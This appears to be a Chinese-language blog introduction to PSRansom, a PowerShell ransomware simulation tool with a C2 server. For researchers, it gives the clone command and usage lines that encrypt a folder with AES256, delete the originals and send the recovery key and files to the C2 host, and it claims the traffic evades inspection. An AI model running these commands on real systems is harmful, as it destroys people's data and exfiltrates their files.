關(guān)于PSRansom

PSRansom是一款帶有C2服務(wù)器功能的PowerShell勒索軟件模擬工具，該工具可以幫助廣大研究人員模擬針對(duì)任何操作系統(tǒng)平臺(tái)(只要安裝了PowerShell即可)的通用勒索軟件數(shù)據(jù)加密過程。在C2服務(wù)器功能的幫助下，我們甚至還可以通過HTTP從目標(biāo)設(shè)備(客戶端)中提取文件，并在服務(wù)器端接收信息。

客戶端和服務(wù)器端之間的通信數(shù)據(jù)都經(jīng)過了加密和編碼，因此是無法被基于流量審計(jì)的檢查工具所檢測到的。

工具要求

PowerShell 4.0或更高版本

工具下載

廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地：git clone https://github.com/JoelGMSec/PSRansom

或者直接訪問該項(xiàng)目的【??Releases頁面??】下載工具的壓縮文件。

下載完成之后，我們將拿到兩個(gè)腳本：PSRansom和C2Server。第一個(gè)將模擬勒索軟件感染，而第二個(gè)將負(fù)責(zé)恢復(fù)文件及其恢復(fù)密鑰。

工具使用

該工具的使用非常簡單，我們只需要指明要加密的目錄、C2 服務(wù)器的 IP 或主機(jī)名以及接收連接的端口。

除此之外，如果我們需要發(fā)送加密文件，則需要在命令結(jié)尾添加-x參數(shù)選項(xiàng)即可。在解密的時(shí)候，只需要指明目錄和恢復(fù)密鑰即可。

工具使用樣例

首先，我們的測試場景定義如下：

• 勒索軟件將在 Windows 機(jī)器上運(yùn)行
• 我們要加密的文件夾位于 C:\Backup
• C2 服務(wù)器將在 Kali Linux 上運(yùn)行
• 所有流量都將通過代理查看詳細(xì)信息

接下來，我們看看該工具提供了哪些操作選項(xiàng)：

命令和控制服務(wù)器的使用也非常簡單，我們只需要指明監(jiān)聽連接的端口和接收連接的端口即可。這里，我們使用的是80端口：

pwsh C2Server.ps1 + 80

接下來，我們將使用以下命令運(yùn)行加密和滲透：

.\PSRansom.ps1 -e directory -s ServerC2 -p port -x

此時(shí)將生成24 個(gè)字母數(shù)字字符(小寫、大寫和數(shù)字)的隨機(jī)密鑰，數(shù)據(jù)將以 AES256 加密，并將恢復(fù)密鑰發(fā)送到 C2 服務(wù)器。

完成后，原始文件將被刪除，僅保留加密的文件：

服務(wù)器端將接收到類似如下圖所示的內(nèi)容：

現(xiàn)在，我們將在服務(wù)器端接收到目標(biāo)設(shè)備的信息、恢復(fù)密鑰、加密文件列表等：

許可證協(xié)議

本項(xiàng)目的開發(fā)與發(fā)布遵循??GPL-3.0??開源許可證協(xié)議。

項(xiàng)目地址

PSRansom：【??GitHub傳送門??】